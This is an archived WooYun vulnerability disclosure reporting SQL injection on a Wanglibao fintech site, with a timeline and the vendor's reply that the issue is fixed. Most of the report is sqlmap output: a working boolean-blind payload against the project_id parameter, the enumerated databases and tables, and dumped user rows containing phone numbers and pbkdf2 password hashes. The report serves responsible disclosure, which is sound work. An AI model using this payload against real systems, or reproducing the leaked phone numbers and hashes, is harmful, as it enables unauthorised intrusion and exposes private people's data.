乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-04: 细节已通知厂商并且等待厂商处理中 2016-01-06: 厂商已经确认,细节仅向厂商公开 2016-01-16: 细节向核心白帽子及相关领域专家公开 2016-01-26: 细节向普通白帽子公开 2016-02-05: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
金融安全不可忽视,在金融会议上看到网利宝CEO,不知道你们家的漏洞有没有礼物相赠。
#Sql注射
http://source.wanglibao.com/monthly.php?action=detail&project_id=2619
注射如图(payload):
sqlmap resumed the following injection point(s) from stored session:---Parameter: project_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=detail&project_id=2619' AND 4993=4993 AND 'slIZ'='slIZ---[17:48:46] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.6.14, Nginxback-end DBMS: MySQL 5[17:48:46] [INFO] fetching database names[17:48:46] [INFO] fetching number of databases[17:48:46] [INFO] resumed: 4[17:48:46] [INFO] resumed: information_schema[17:48:46] [INFO] resumed: passport[17:48:47] [INFO] resumed: test[17:48:47] [INFO] resumed: wanglibaoavailable databases [4]:[*] information_schema[*] passport[*] test[*] wanglibao
#wanglibao数据库库表:
Database: wanglibao[40 tables]+------------------------+| user || access || admin_actor || admin_actor_group || admin_actor_permission || admin_permission || admin_permission_group || admin_user || adminuser || agreement_template || amortization || attchment || bank || buy_exchange || buy_exchange_purchase || buydetail || category || codes || comfirm || company || contract || coupon || dbcache || filepool || id_genter || loginlog || node || oncontract || op_log || operationlog || project || project_addon || project_agreement || project_detail || role || sessions || sqs_content || sysinfo || system_log || user_amortization |+------------------------+
#金融安全未深入,跑出USER部分数据,只为点到。
Database: wanglibaoTable: user[6 entries]+----+-------------+-------------------------------------------------------------------------------+| id | name | password |+----+-------------+-------------------------------------------------------------------------------+| 1 | 13910562833 | pbkdf2_sha256$12000$gEdb355E6tSC$pZ4QJxOFuRVWvuippiTFyjS+uWVOlIPWDlhWWYe7kr8= || 2 | 13910562433 | pbkdf2_sha256$12000$lZ7HuO4jqIMS$25o5BMM2Nyg9mdvNnBb9mBWhF45JjAu220Hqti8SgeM= || 3 | 13910563421 | pbkdf2_sha256$12000$j6EF1sEIwhk0$Ntw399lGkswW/+bEledT0ZjT9wM+R9NS2tHy4nn4cdA= || 4 | 13269296780 | pbkdf2_sha256$12000$NP4jJnluNTCH$7HmCLwNCuN2Hj3DwU3J5aNPqseWw5ynqypP86PCLQic= || 5 | 17601645914 | pbkdf2_sha256$12000$76rYfEgZal5B$g3KuEZAeIBuZcCdX2aRsIQt/6lnorxoB0o/sUXOYQys= |
我是来找礼物的.
危害等级:中
漏洞Rank:9
确认时间:2016-01-06 23:23
已安排处理
2016-01-26:此为测试环境,已修复。